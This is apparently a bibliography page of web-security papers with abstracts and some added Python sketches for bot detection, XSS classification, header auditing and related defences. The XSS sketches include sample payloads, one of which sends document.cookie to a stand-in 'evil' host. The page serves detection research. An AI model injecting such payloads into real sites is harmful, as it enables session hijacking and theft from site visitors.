Biblio

Found 100 results

Filters: Keyword is Web sites
2022-06-30
Arai, Tsuyoshi, Okabe, Yasuo, Matsumoto, Yoshinori.  2021.  Precursory Analysis of Attack-Log Time Series by Machine Learning for Detecting Bots in CAPTCHA. 2021 International Conference on Information Networking (ICOIN). :295—300.
CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is commonly used to prevent bots from attacking Web sites. State-of-the-art CAPTCHAs vary in difficulty based on the client's behavior, allowing for efficient bot detection without sacrificing simplicity. In this research, we focus on detecting bots by supervised machine learning from past access-log time series. We have analyzed access logs to several Web services that use a commercial cloud-based CAPTCHA service, Capy Puzzle CAPTCHA. Experiments show that bots in attacks spanning a month can be detected with high accuracy by precursory analysis using only the first day of the access log as training data. In addition, we manually analyzed the data flagged as false positives in the discrimination results and found that the proposed model actually detects access by bots that had been overlooked in the first-stage manual labeling performed when preparing the training data.
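A minimal sketch of the general idea described in this abstract: train a classifier on labeled day-one access-log sessions and use it to flag bots in later traffic. The feature set, log format, and function names below are illustrative assumptions, not the authors' implementation.

```python
# Sketch: supervised bot detection from access-log time series (assumed features).
import numpy as np
from sklearn.ensemble import RandomForestClassifier

def featurize(timestamps):
    """Turn one client's time-ordered request timestamps into simple features."""
    gaps = np.diff(timestamps) if len(timestamps) > 1 else np.array([0.0])
    return [
        len(timestamps),      # number of requests in the session
        float(gaps.mean()),   # mean inter-request gap (seconds)
        float(gaps.std()),    # burstiness
        float(gaps.min()),    # fastest repeated request
    ]

def train_day_one(day_one_sessions):
    """day_one_sessions: list of (timestamps, is_bot) pairs, is_bot in {0, 1}."""
    X = [featurize(ts) for ts, _ in day_one_sessions]
    y = [label for _, label in day_one_sessions]
    clf = RandomForestClassifier(n_estimators=100, random_state=0)
    clf.fit(X, y)
    return clf

def flag_bots(clf, later_sessions):
    """Return indices of later sessions the model predicts as bots."""
    X = [featurize(ts) for ts in later_sessions]
    return [i for i, p in enumerate(clf.predict(X)) if p == 1]
```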
2022-03-10
Gupta, Subhash Chand, Singh, Nidhi Raj, Sharma, Tulsi, Tyagi, Akshita, Majumdar, Rana.  2021.  Generating Image Captions using Deep Learning and Natural Language Processing. 2021 9th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions) (ICRITO). :1—4.
In today's world, there is rapid progress in the field of artificial intelligence and image captioning. Image captioning has become a fascinating task that has seen widespread interest. It comprises generating an image description through a hybrid combination of deep learning, natural language processing, and various approaches from machine learning and computer vision. In this work, the authors emphasize how the model generates a short description as output for an input image using the functionalities of deep learning and natural language processing, to help visually impaired people; it can also be used on various web sites to automate the generation of captions, greatly reducing the effort of manual description.
2022-03-08
Gupta, Divya, Wadhwa, Shivani, Rani, Shalli.  2021.  On the Role of Named Data Networking for IoT Content Distribution. 2021 6th International Conference on Communication and Electronics Systems (ICCES). :544–549.
The internet was initially designed as a communication network. Hosts share specific IP addresses to establish a communication channel for transferring messages. However, with the advancement of internet technologies and the recent growth of applications such as social networking, web sites, and the number of smartphone users, the internet today acts as a distribution network. Content distribution for large-volume traffic on the internet mainly suffers from two issues: 1) IP address allocation for each request message and 2) real-time content delivery. Moreover, users nowadays care only about getting data, irrespective of its location. To meet the need for content-centric networking (CCN), information-centric networking (ICN) has been proposed as the future internet architecture. Named Data Networking (NDN) has its roots under the umbrella of ICN as one of its projects aiming to overcome the issues listed above. NDN is based on retrieving named data from intermediate nodes. This conceptual shift raises questions about its design, services, and challenges. In this paper, we contribute by presenting the architectural design of NDN with its routing and forwarding mechanism. Subsequently, we cover the services offered by NDN for request-response message communication. Furthermore, the challenges faced in implementing NDN are discussed at the end.
2022-01-31
Baumann, Lukas, Heftrig, Elias, Shulman, Haya, Waidner, Michael.  2021.  The Master and Parasite Attack. 2021 51st Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN). :141—148.
We explore a new type of malicious script attack: the persistent parasite attack. Persistent parasites are stealthy scripts which persist for a long time in the browser's cache. We show how to infect the caches of victims with parasite scripts via TCP injection. Once the cache is infected, we implement methodologies for propagating the parasites to other popular domains on the victim client as well as to other caches on the network. We show how to design the parasites so that they stay in the victim's cache for a long time, not restricted to the duration of the user's visit to the web site. We develop covert channels for communication between the attacker and the parasites, which allow the attacker to control which scripts are executed and when, and to exfiltrate private information such as cookies and passwords. We then demonstrate how to leverage the parasites to perform sophisticated attacks, and evaluate the attacks against a range of applications and security mechanisms on popular browsers. Finally, we provide recommendations for countermeasures.
2021-06-01
Lu, Chang, Lei, Xiaochun, Xie, Junlin, Wang, Xiaolong, Mu, XiangBoge.  2020.  Panoptic Feature Pyramid Network Applications In Intelligent Traffic. 2020 16th International Conference on Computational Intelligence and Security (CIS). :40–43.
Intelligent transportation is an important part of urban development, and its core is mastering urban road conditions. This system processes dashcam video with a Panoptic Segmentation network and adds a tracking module based on comparing consecutive frames with the KM algorithm. The system mainly includes the following parts: an embedded device, the Panoptic Feature Pyramid Network, a cloud server, and a Web site.
2021-03-18
Banday, M. T., Sheikh, S. A..  2020.  Improving Security Control of Text-Based CAPTCHA Challenges using Honeypot and Timestamping. 2020 Fourth International Conference on Computing Methodologies and Communication (ICCMC). :704—708.

The resistance to attacks that aim to break CAPTCHA challenges, and usability (the effectiveness, efficiency, and satisfaction of human users in solving them) are the two major concerns when designing CAPTCHA schemes. User-friendliness, universality, and accessibility are related dimensions of usability, which must also be addressed adequately. With recent advances in segmentation and optical character recognition techniques, complex distortions, degradations, and transformations are added to text-based CAPTCHA challenges, resulting in reduced usability. The extent of these deformations can be decreased if an additional security mechanism is incorporated into such challenges. This paper proposes an additional security mechanism that can add an extra layer of protection to any text-based CAPTCHA challenge, making it more challenging for bots and scripts that might be used to attack websites and web applications. It proposes the use of hidden text boxes for user entry of the CAPTCHA string, which serve as honeypots for bots and automated scripts. The honeypot technique tricks bots and automated scripts into filling in input fields that legitimate human users cannot fill in. The paper reports an implementation of the honeypot technique and the results of tests carried out over three months during which form submissions were logged for analysis. The results demonstrate the great effectiveness of the honeypot technique in improving the security control and usability of text-based CAPTCHA challenges.
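A minimal server-side sketch of the honeypot-plus-timestamping idea described above (not the paper's implementation). The field names and thresholds are assumptions; the hidden "captcha_extra" field would be made invisible to humans via CSS, so only automated scripts fill it.

```python
# Sketch: reject form submissions that trip the honeypot field or arrive too fast.
import time

MIN_FILL_SECONDS = 3      # a human needs at least a few seconds to fill the form
MAX_FILL_SECONDS = 600    # a very stale form is suspicious as well

def looks_like_bot(form_data, form_rendered_at, now=None):
    now = now or time.time()
    # Honeypot: the hidden field must stay empty for legitimate users.
    if form_data.get("captcha_extra", "").strip():
        return True
    # Timestamping: submissions that are too fast or too old are likely scripted.
    elapsed = now - form_rendered_at
    return elapsed < MIN_FILL_SECONDS or elapsed > MAX_FILL_SECONDS

# Example: a submission 0.4 seconds after the form was served is rejected.
print(looks_like_bot({"captcha_extra": ""}, form_rendered_at=time.time() - 0.4))  # True
```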

2021-02-10
Kerschbaumer, C., Ritter, T., Braun, F..  2020.  Hardening Firefox against Injection Attacks. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS PW). :653—663.
Web browsers display content in the form of HTML, CSS and JavaScript retrieved from the world wide web. The loaded content is subject to the web security model and considered untrusted and potentially malicious. To complicate security matters, Firefox uses the same technologies to render its user interface as it does to render untrusted web content, which blurs the distinction between the two privilege levels. Getting interactions between the two correct turns out to be complicated and has led to numerous real-world security vulnerabilities. We study those vulnerabilities to discover common threats and explain how we address them systematically to harden Firefox.
Singh, M., Singh, P., Kumar, P..  2020.  An Analytical Study on Cross-Site Scripting. 2020 International Conference on Computer Science, Engineering and Applications (ICCSEA). :1—6.
Cross-Site Scripting, also called XSS, is a type of injection in which malicious scripts are injected into trusted websites. When malicious code, usually in the form of browser-side script, is injected via a web application and delivered to a different end user, an XSS attack is said to have taken place. The flaws that allow this attack to succeed are remarkably widespread and occur anywhere a web application handles user input without validating or encoding it. A study carried out by Symantec states that more than 50% of websites are vulnerable to the XSS attack. Security engineers at Microsoft coined the term "Cross-Site Scripting" in January 2000, but XSS vulnerabilities have been reported and exploited since the early 1990s, with victims including the (then) tech giants Twitter, Myspace, Orkut, Facebook and YouTube; hence the name "Cross-Site" Scripting. This attack can be combined with other attacks, such as phishing, to make it more lethal, but that usually is not necessary: it is already extremely difficult to deal with from a user perspective because in many cases it looks very legitimate, leveraging attacks against our banks and shopping websites rather than some fake malicious website.
Varlioglu, S., Gonen, B., Ozer, M., Bastug, M..  2020.  Is Cryptojacking Dead After Coinhive Shutdown? 2020 3rd International Conference on Information and Computer Technologies (ICICT). :385—389.
Cryptojacking is the exploitation of victims' computer resources to mine cryptocurrency using malicious scripts. It became popular after 2017, when attackers started to exploit legal mining scripts, especially Coinhive scripts. Coinhive was a legal mining service that provided scripts and servers for in-browser mining activities. Nevertheless, over 10 million web users had been victimized every month before the Coinhive shutdown in March 2019. This paper explores the new era of the cryptojacking world after Coinhive discontinued its service. We aimed to see whether and how attackers continue cryptojacking, generate new malicious scripts, and develop new methods. We used a capable cryptojacking detector named CMTracker, proposed by Hong et al. in 2018. We automatically and manually examined 2770 websites that had been detected by CMTracker before the Coinhive shutdown. The results revealed that 99% of the sites no longer run cryptojacking; 1% of the websites still run 8 unique mining scripts. By tracking these mining scripts, we detected 632 unique cryptojacking websites. Moreover, open-source intelligence (OSINT) investigations demonstrated that attackers still use the same methods. Therefore, we list the typical patterns of cryptojacking. We conclude that cryptojacking is not dead after the Coinhive shutdown; it is still alive, but not as attractive as it used to be.
Tizio, G. Di, Ngo, C. Nam.  2020.  Are You a Favorite Target For Cryptojacking? A Case-Control Study On The Cryptojacking Ecosystem. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS PW). :515—520.
Illicitly hijacking visitors' computational resources to mine cryptocurrency via compromised websites is a consolidated activity. Previous works mainly focused on large-scale analysis of the cryptojacking ecosystem, technical means to detect browser-based mining, and the economic incentives of cryptojacking. So far, no one has studied whether certain technical characteristics of a website can increase (or decrease) the likelihood of it being compromised for cryptojacking campaigns. In this paper, we propose to address this unanswered question by conducting a case-control study with cryptojacking websites obtained by crawling the web using Minesweeper. Our preliminary analysis shows some association for certain website characteristics; however, the results obtained are not statistically significant. Thus, more data must be collected and further analysis conducted to gain better insight into the impact of these relations.
2021-02-03
Adil, M., Khan, R., Ghani, M. A. Nawaz Ul.  2020.  Preventive Techniques of Phishing Attacks in Networks. 2020 3rd International Conference on Advancements in Computational Sciences (ICACS). :1—8.

The internet is the most widely used technology in the current era of information technology and is embedded in daily life activities. Due to its extensive use in everyday life, it has many applications such as social media (Facebook, WhatsApp, Messenger, etc.) and other online applications such as online businesses, e-counseling, advertisement on websites, e-banking, e-hunting websites, e-doctor appointments and e-doctor opinions. These applications of internet technology make things easy and accessible for people in limited time; however, the technology is vulnerable to various security threats. A vital and severe threat associated with this technology, or with a particular application, is the phishing attack, which attackers use to undermine network security. Phishing attacks include fake e-mails, fake websites, and fake applications that are used to steal users' credentials or compromise their security. In this paper, we give a detailed overview of various phishing attacks, specifically their background, and the solutions proposed in the literature to address these issues using techniques such as anti-phishing measures, honeypots, and firewalls, as well as the installation of intrusion detection systems (IDS) and intrusion detection and prevention systems (IPS) in networks to allow only authentic traffic in an operational network. In this work, we also conducted an end-user awareness campaign to educate and train employees in order to minimize the probability of these attacks occurring. The results observed for this survey were quite positive in terms of effectiveness in addressing the aforementioned issues.

2021-01-15
Korolev, D., Frolov, A., Babalova, I..  2020.  Classification of Websites Based on the Content and Features of Sites in Onion Space. 2020 IEEE Conference of Russian Young Researchers in Electrical and Electronic Engineering (EIConRus). :1680—1683.
This paper describes a method for classifying onion sites. Based on the results of the research, a model of the most common type of site in onion space is built. To create such a model, a specially trained neural network is used. The neural network's classification is based on five different features: use of an authentication system, corporate email, readable URL, feedback, and type of onion site. Statistics on the most common types of websites on the Dark Net are given.
2020-12-14
Ge, K., He, Y..  2020.  Detection of Sybil Attack on Tor Resource Distribution. 2020 IEEE International Conference on Power, Intelligent Computing and Systems (ICPICS). :328–332.
The resource distribution of the Tor anonymous communication system is vulnerable to enumeration attacks. Zhao treats users who requested resources that turn out to be unavailable as suspicious malicious users and gradually reduces the scope of suspicious users through several stages to lower the false positive rate. However, it takes several stages to distinguish users; although this method successfully detects the malicious users, they have already acquired many resources in the earlier stages, which reduces the availability of the anonymous communication system. This paper proposes a detection method based on Integer Linear Programming to detect malicious users who perform enumeration attacks on resources during resource distribution. First, we construct a bipartite graph between the unavailable resources and the users who requested them in the anonymous communication system; next, we use Integer Linear Programming to find the minimum malicious user set. We simulate the resource distribution process with a computer program and perform an experimental analysis of the proposed method. Experimental results show that the accuracy of the method is above 80% when the unavailable resources in the system account for no more than 50%, which is about 10% higher than Zhao's method.
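A minimal sketch of the ILP formulation described in this abstract (not the authors' code), using the PuLP library as an assumed solver: every unavailable resource must be covered by at least one selected user who requested it, and the number of selected (suspected malicious) users is minimized.

```python
# Sketch: minimum malicious user set as a set-cover ILP over a bipartite graph.
import pulp

def min_malicious_users(requests):
    """requests: dict mapping unavailable resource -> set of users who requested it."""
    users = set().union(*requests.values())
    x = {u: pulp.LpVariable(f"x_{u}", cat="Binary") for u in users}

    prob = pulp.LpProblem("min_malicious_user_set", pulp.LpMinimize)
    prob += pulp.lpSum(x.values())                           # objective: fewest users
    for resource, requesters in requests.items():
        prob += pulp.lpSum(x[u] for u in requesters) >= 1    # cover each unavailable resource
    prob.solve(pulp.PULP_CBC_CMD(msg=False))
    return [u for u in users if x[u].value() == 1]

# Toy example: two unavailable bridges, both requested by user "u1".
print(min_malicious_users({"bridge_a": {"u1", "u2"}, "bridge_b": {"u1", "u3"}}))
```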
Habibi, G., Surantha, N..  2020.  XSS Attack Detection With Machine Learning and n-Gram Methods. 2020 International Conference on Information Management and Technology (ICIMTech). :516–520.

Cross-Site Scripting (XSS) is an attack in which attackers insert malicious scripts into a website. The attack takes the user to a webpage that has been specifically designed to retrieve user sessions and cookies. Nearly 68% of websites are vulnerable to XSS attacks. In this study, the authors evaluate several machine learning methods, namely Support Vector Machine (SVM), K-Nearest Neighbour (KNN), and Naïve Bayes (NB). Each machine learning algorithm is then combined with the n-gram method applied to the script features to improve the detection performance for XSS attacks. The simulation results show that the SVM with the n-gram method achieves the highest accuracy, at 98%.
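A minimal sketch of the n-gram plus SVM idea from this abstract: character n-grams of scripts as features, an SVM as the classifier. The tiny training set below is an illustrative assumption, not the paper's dataset.

```python
# Sketch: character n-gram features feeding a linear SVM for XSS detection.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.svm import SVC
from sklearn.pipeline import make_pipeline

samples = [
    "<script>document.location='http://evil/?c='+document.cookie</script>",  # XSS
    "<img src=x onerror=alert(1)>",                                          # XSS
    "<p>Welcome back, please review your order summary.</p>",                # benign
    "<a href='/products?id=42'>View product</a>",                            # benign
]
labels = [1, 1, 0, 0]

model = make_pipeline(
    CountVectorizer(analyzer="char", ngram_range=(1, 3)),  # character 1- to 3-grams
    SVC(kernel="linear"),
)
model.fit(samples, labels)
print(model.predict(["<svg onload=alert(document.cookie)>"]))  # expected: [1]
```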

2020-11-23
Haddad, G. El, Aïmeur, E., Hage, H..  2018.  Understanding Trust, Privacy and Financial Fears in Online Payment. 2018 17th IEEE International Conference On Trust, Security And Privacy In Computing And Communications/ 12th IEEE International Conference On Big Data Science And Engineering (TrustCom/BigDataSE). :28–36.
In online payment, customers must transmit their personal and financial information through the website to conclude their purchase and pay for the services or items selected. They may face fears about online transactions raised by their perception of the risk of financial or privacy loss, and they may have concerns over the payment decision leading to negative behaviors such as shopping cart abandonment. Therefore, three major players need to be addressed in online payment: the online seller, the payment page, and the customers' own perception. However, few studies have explored these three players in an online purchasing environment. In this paper, we focus on customer concerns and examine the antecedents of trust and payment security perception, as well as their joint effect on two fundamentally important customer aspects: privacy concerns and financial fear perception. A total of 392 individuals participated in an online survey. The results highlight the importance of the seller website's components (such as ease of use, security signs, and quality information) and their impact on perceived payment security, as well as their impact on customers' trust and financial fear perception. The objective of our study is to design a research model that explains the factors contributing to an online payment decision.
2020-11-20
Lavrenovs, A., Melón, F. J. R..  2018.  HTTP security headers analysis of top one million websites. 2018 10th International Conference on Cyber Conflict (CyCon). :345—370.
We present research on the security of the most popular websites, ranked according to Alexa's top one million list, based on an analysis of HTTP response headers. For each of the domains included in the list, we made four different requests: an HTTP/1.1 request to the domain itself and to its "www" subdomain, and two equivalent HTTPS requests. Redirections were always followed. A detailed discussion of the request process and main outcomes is presented, including X.509 certificate issues and a comparison of results with equivalent HTTP/2 requests. The body of the responses was discarded, and the HTTP response header fields were stored in a database. We analysed the prevalence of the most important response headers related to web security aspects. In particular, we took into account Strict-Transport-Security, Content-Security-Policy, X-XSS-Protection, X-Frame-Options, Set-Cookie (for session cookies) and X-Content-Type. We also reviewed the contents of response HTTP headers that could potentially reveal unwanted information, like Server (and related headers), Date and Referrer-Policy. This research offers an up-to-date survey of the current prevalence of web security policies implemented through HTTP response headers and concludes that the most popular sites tend to implement them noticeably more often than less popular ones. Equally, HTTPS sites seem to be far more eager to implement those policies than HTTP-only websites. A comparison with previous works shows that web security policies based on HTTP response headers are continuously growing, but still far from satisfactory widespread adoption.
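A minimal sketch of the survey idea from this abstract: request a site (following redirects, as the paper does) and record which security-related response headers are present and which headers leak information. The `requests` dependency and the exact header list checked are assumptions for illustration.

```python
# Sketch: audit one domain's HTTP response headers for common security policies.
import requests

SECURITY_HEADERS = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-XSS-Protection",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "Referrer-Policy",
]

def audit_headers(domain):
    resp = requests.get(f"https://{domain}/", allow_redirects=True, timeout=10)
    present = {h: resp.headers.get(h) for h in SECURITY_HEADERS if h in resp.headers}
    leaky = {h: resp.headers.get(h) for h in ("Server", "X-Powered-By") if h in resp.headers}
    return {"status": resp.status_code, "security": present, "information_leak": leaky}

print(audit_headers("example.com"))
```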
2020-11-04
Khurana, N., Mittal, S., Piplai, A., Joshi, A..  2019.  Preventing Poisoning Attacks On AI Based Threat Intelligence Systems. 2019 IEEE 29th International Workshop on Machine Learning for Signal Processing (MLSP). :1—6.

As AI systems become more ubiquitous, securing them becomes an emerging challenge. Over the years, with the surge in online social media use and the data available for analysis, AI systems have been built to extract, represent and use this information. The credibility of this information extracted from open sources, however, can often be questionable. Malicious or incorrect information can cause a loss of money, reputation, and resources; and in certain situations, pose a threat to human life. In this paper, we use an ensembled semi-supervised approach to determine the credibility of Reddit posts by estimating their reputation score to ensure the validity of information ingested by AI systems. We demonstrate our approach in the cybersecurity domain, where security analysts utilize these systems to determine possible threats by analyzing the data scattered on social media websites, forums, blogs, etc.

2020-10-16
Gaio Rito, Cátia Sofia, Beatriz Piedade, Maria, Eugénio Lucas, Eugénio.  2019.  E-Government - Qualified Digital Signature Case Study. 2019 14th Iberian Conference on Information Systems and Technologies (CISTI). :1—6.

This paper presents a case study on the use and implementation of the Qualified Digital Signature. Issues such as the degree of use, the security and authenticity of the Qualified Digital Signature, and the publication and dissemination of documents signed in digital format are analyzed. To support the case study, a methodology was adopted that included interviews with municipalities that are part of the Intermunicipal Community of the region of Leiria, and a computer application was developed to analyze which of the documents available on the municipalities' institutional websites were digitally signed. The results show that institutional websites are already providing documentation with the Qualified Digital Signature and that the level of trust and authenticity regarding its use is considered mostly very positive.

Shayganmehr, Masoud, Montazer, Gholam Ali.  2019.  Identifying Indexes Affecting the Quality of E-Government Websites. 2019 5th International Conference on Web Research (ICWR). :167—171.

With the development of new technologies around the world, governments tend to communicate with citizens and businesses with the help of such technologies. Electronic government (e-government) is defined as the use of information technologies such as electronic networks, the Internet, and mobile phones by organizations and state institutions to enable wide communication between citizens, businesses, and different state institutions. The development of e-government starts with creating a website to share information with users, which is considered the main infrastructure for further development. Website assessment is a way of improving service quality. Different international studies have introduced various indexes for website assessment, but each considers only some dimensions of a website. In this paper, based on a careful review of previous studies, the most important indexes for website quality assessment are "web design", "navigation", "services", "maintenance and support", "citizen participation", "information quality", "privacy and security", "responsiveness", and "usability". Considering these indexes when designing a website facilitates user interaction with e-government websites.

2020-09-28
Lv, Chengcheng, Zhang, Long, Zeng, Fanping, Zhang, Jian.  2019.  Adaptive Random Testing for XSS Vulnerability. 2019 26th Asia-Pacific Software Engineering Conference (APSEC). :63–69.
XSS is one of the common vulnerabilities in web applications. Many black-box testing tools collect a large number of payloads and traverse them to find a payload that can be successfully injected, but they are not very efficient, and previous research has paid little attention to improving the efficiency of black-box testing for detecting XSS vulnerabilities. To improve testing efficiency, we developed an XSS testing tool. It collects 6128 payloads and uses a headless browser to detect XSS vulnerabilities. The tool can discover XSS vulnerabilities quickly with the ART (Adaptive Random Testing) method. We conducted an experiment using 3 widely adopted open-source vulnerable benchmarks and 2 actual websites to evaluate the ART method. The experimental results indicate that the ART method improves on the fuzzing method by more than 27.1% in reducing the number of attempts before accomplishing a successful injection.
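A minimal sketch of adaptive random payload selection in the spirit of this abstract (not the authors' tool): from a random candidate set, pick the payload most distant from the payloads already tried, so successive attempts spread over the payload space. The trigram Jaccard distance is an illustrative assumption.

```python
# Sketch: fixed-size-candidate-set ART selection over XSS payload strings.
import random

def trigrams(s):
    return {s[i:i + 3] for i in range(max(len(s) - 2, 1))}

def distance(a, b):
    ta, tb = trigrams(a), trigrams(b)
    return 1.0 - len(ta & tb) / max(len(ta | tb), 1)

def next_payload(pool, tried, k=10):
    candidates = random.sample(pool, min(k, len(pool)))
    if not tried:
        return random.choice(candidates)
    # Farthest-candidate rule: maximise the minimum distance to executed payloads.
    return max(candidates, key=lambda c: min(distance(c, t) for t in tried))

pool = ["<script>alert(1)</script>", "<img src=x onerror=alert(1)>",
        "<svg/onload=alert(1)>", "'\"><script>alert(1)</script>"]
tried = ["<script>alert(1)</script>"]
print(next_payload([p for p in pool if p not in tried], tried))
```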
Mohammadi, Mahmoud, Chu, Bill, Richter Lipford, Heather.  2019.  Automated Repair of Cross-Site Scripting Vulnerabilities through Unit Testing. 2019 IEEE International Symposium on Software Reliability Engineering Workshops (ISSREW). :370–377.
Many web applications are vulnerable to Cross-Site Scripting (XSS) attacks, enabling attackers to steal sensitive information and commit fraud. Much research in this area has focused on detecting vulnerable web pages using static and dynamic program analysis. The best practice for preventing XSS vulnerabilities is to encode untrusted dynamic content; however, a common programming error is the use of the wrong type of encoder to sanitize untrusted data, leaving the application vulnerable. We propose a new approach that can automatically fix this common type of XSS vulnerability in many situations. The approach is integrated into the software maintenance life cycle through unit testing. Vulnerable code is refactored to reflect the suggested encoder and then verified using an attack-evaluating mechanism to find a proper repair. Evaluation of this approach has been conducted on an open-source medical record application with over 200 web pages written in JSP.
2020-09-11
Shekhar, Heemany, Moh, Melody, Moh, Teng-Sheng.  2019.  Exploring Adversaries to Defend Audio CAPTCHA. 2019 18th IEEE International Conference On Machine Learning And Applications (ICMLA). :1155—1161.
CAPTCHA is a web-based authentication method used by websites to distinguish between humans (valid users) and bots (attackers). Audio captcha is an accessible captcha meant for visually impaired users, such as color-blind, blind, and near-sighted users. Firstly, this paper analyzes how secure current audio captchas are against attacks using machine learning (ML) and deep learning (DL) models. Each audio captcha is made up of five, seven, or ten random digits [0-9] spoken one after the other, with varying background noise throughout the length of the audio. If the ML or DL model is able to correctly identify all spoken digits, in the correct order of occurrence, in a single audio captcha, we consider that captcha broken and the attack successful. Throughout the paper, accuracy refers to the attack model's success at breaking audio captchas; the higher the attack accuracy, the less secure the audio captchas are. In our baseline experiments, we found that attack models could break audio captchas with no or medium background noise, for any number of spoken digits, with nearly 99% to 100% accuracy, whereas audio captchas with high background noise were relatively more secure, with an attack accuracy of 85%. Secondly, we propose that concepts from adversarial example algorithms can be used to create a new kind of audio captcha that is more resilient to attacks. We found that even after retraining the models on the new adversarial audio data, the attack accuracy remained as low as 25% to 36%. Lastly, we explore the benefits of creating adversarial audio captchas with different algorithms such as the Basic Iterative Method (BIM) and DeepFool. We found that as long as the attacker has less than 45% of the samples from each kind of adversarial audio dataset, the defense will be successful at preventing attacks.
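A minimal sketch of the Basic Iterative Method (BIM) mentioned above, applied to an audio sample. The linear "digit scorer" is a stand-in assumption for a real speech model; only the iterative, clipped gradient-sign update is the point of the example.

```python
# Sketch: BIM-style adversarial perturbation of an audio vector against a toy scorer.
import numpy as np

rng = np.random.default_rng(0)
W = rng.normal(size=(10, 16000))          # toy per-digit score weights (assumption)
x = rng.normal(scale=0.1, size=16000)     # one second of "audio" at 16 kHz
true_digit = 7

def loss_grad(x, label):
    # Gradient of a margin between the true digit's score and its best rival
    # for the toy linear scorer; a real model would supply this via backprop.
    scores = W @ x
    rival = int(np.argmax(np.delete(scores, label)))
    rival += rival >= label                # re-index after the deletion
    return W[label] - W[rival]

def bim(x, label, eps=0.05, alpha=0.005, steps=20):
    x_adv = x.copy()
    for _ in range(steps):
        x_adv = x_adv - alpha * np.sign(loss_grad(x_adv, label))  # push true score down
        x_adv = np.clip(x_adv, x - eps, x + eps)                  # stay within the eps-ball
    return x_adv

x_adv = bim(x, true_digit)
print("max perturbation:", np.max(np.abs(x_adv - x)))
```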
2020-09-04
Moe, Khin Su Myat, Win, Thanda.  2018.  Enhanced Honey Encryption Algorithm for Increasing Message Space against Brute Force Attack. 2018 15th International Conference on Electrical Engineering/Electronics, Computer, Telecommunications and Information Technology (ECTI-CON). :86—89.
In the era of digitization, data security plays a vital role in message transmission, and all systems that deal with users require stronger encryption techniques that resist brute-force attacks. The honey encryption (HE) algorithm is a user-data protection algorithm that can deceive attackers attempting unauthorized access to users, databases, and websites. The main part of conventional HE is the distribution-transforming encoder (DTE). However, the current DTE process using a cumulative distribution function (CDF) suffers from a message-space limitation, because the CDF approach cannot handle the probability distribution for more than four messages. So, we propose a new DTE process using a discrete distribution function in order to solve the message-space limitation problem. Our proposed honeywords generation method also addresses the storage overhead problem of existing honeywords generation methods. In this paper, we also describe case-study calculations of the DTE to show that the new DTE process has no message-space limitation and that a mathematical model using a discrete distribution function for the DTE process facilitates the probability analysis.
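A minimal sketch (an interpretation, not the authors' scheme) of a distribution-transforming encoder over a discrete message distribution: each message owns a share of the seed space proportional to its probability, so decoding any seed, including one produced by decryption under a wrong key, yields a plausible message.

```python
# Sketch: discrete-distribution DTE mapping messages to seed ranges and back.
import secrets

SEED_SPACE = 2 ** 16

def build_dte(distribution):
    """distribution: dict message -> probability (sums to 1). Returns seed ranges."""
    ranges, start = {}, 0
    for msg, p in distribution.items():
        width = round(p * SEED_SPACE)
        ranges[msg] = (start, start + width)
        start += width
    return ranges

def encode(ranges, msg):
    lo, hi = ranges[msg]
    return lo + secrets.randbelow(hi - lo)     # uniform seed within the message's range

def decode(ranges, seed):
    for msg, (lo, hi) in ranges.items():
        if lo <= seed < hi:
            return msg
    return None

ranges = build_dte({"password123": 0.5, "letmein": 0.3, "qwerty": 0.2})
seed = encode(ranges, "letmein")
print(decode(ranges, seed))   # "letmein"; any random seed decodes to a plausible password
```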
2020-07-13
Agrawal, Shriyansh, Sanagavarapu, Lalit Mohan, Reddy, YR.  2019.  FACT - Fine grained Assessment of web page CredibiliTy. TENCON 2019 - 2019 IEEE Region 10 Conference (TENCON). :1088–1097.
With more than a trillion web pages, there is a plethora of content available for consumption. Search engine queries invariably lead to overwhelming information, parts of it relevant and some of it irrelevant. Often the information provided can be conflicting, ambiguous, and inconsistent, contributing to a loss of credibility of the content. In the past, researchers have proposed approaches for credibility assessment and enumerated factors influencing the credibility of web pages. In this work, we detail the WEBCred framework for automated genre-aware credibility assessment of web pages. We developed a tool based on the proposed framework to extract web page feature instances and identify the genre a web page belongs to while assessing its Genre Credibility Score (GCS). We validated our approach on an `Information Security' dataset of 8,550 URLs with 171 features across 7 genres. The supervised learning algorithm, Gradient Boosted Decision Tree, classified genres with 88.75% testing accuracy over 10-fold cross-validation, an improvement over the current benchmark. We also examined our approach on `Health' domain web pages and obtained comparable results. The calculated GCS correlated 69% with the crowdsourced Web Of Trust (WOT) score and 13% with the algorithm-based Alexa ranking across 5 information security groups. This variance in correlation indicates that our GCS approach aligns with the human way (WOT) rather than the algorithmic way (Alexa) of web assessment in both experiments.
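A minimal sketch of the genre-classification step mentioned in this abstract, with scikit-learn's gradient boosted decision tree standing in for the paper's model. The feature columns and genre labels below are illustrative assumptions, not the WEBCred feature set.

```python
# Sketch: cross-validated genre classification with a gradient boosted decision tree.
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import cross_val_score

# Each row: [outbound_links, ads_count, has_https, text_length, forms_count]
X = [
    [120, 0, 1, 5400, 1],   # labeled "help" genre
    [300, 9, 0, 800, 0],    # labeled "portrayal" genre
    [80, 1, 1, 6200, 2],    # "help"
    [250, 7, 0, 650, 0],    # "portrayal"
    [95, 0, 1, 4900, 1],    # "help"
    [310, 8, 0, 700, 1],    # "portrayal"
]
y = ["help", "portrayal", "help", "portrayal", "help", "portrayal"]

clf = GradientBoostingClassifier(n_estimators=50, random_state=0)
print(cross_val_score(clf, X, y, cv=3).mean())   # cross-validated accuracy, as in the paper
```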
2020-07-10
Yulianto, Arief Dwi, Sukarno, Parman, Warrdana, Aulia Arif, Makky, Muhammad Al.  2019.  Mitigation of Cryptojacking Attacks Using Taint Analysis. 2019 4th International Conference on Information Technology, Information Systems and Electrical Engineering (ICITISEE). :234—238.

